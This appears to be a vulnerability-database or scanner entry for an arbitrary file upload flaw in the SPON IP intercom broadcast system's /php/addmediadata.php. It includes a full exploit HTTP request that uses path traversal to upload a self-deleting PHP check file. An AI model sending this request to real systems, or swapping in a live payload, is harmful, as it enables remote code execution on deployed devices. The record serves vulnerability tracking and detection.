vendor = "世邦通信"
name = "世邦通信 SPON IP 网络对讲广播系统addmediadata.php任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/php/addmediadata.php"
detail = "POST /php/addmediadata.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16Content-Length: 514 Content-Type: multipart/form-data; boundary=de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 Accept-Encoding: gzip, deflate, br Connection: close --de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 Content-Disposition: form-data; name=\"fullpath\" ../--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 Content-Disposition: form-data; name=\"subpath\" /--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 Content-Disposition: form-data; name=\"file\"; filename=\"test.php\" Content-Type: application/octet-stream <?php echo md5(1);unlink(__FILE__);?> --de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
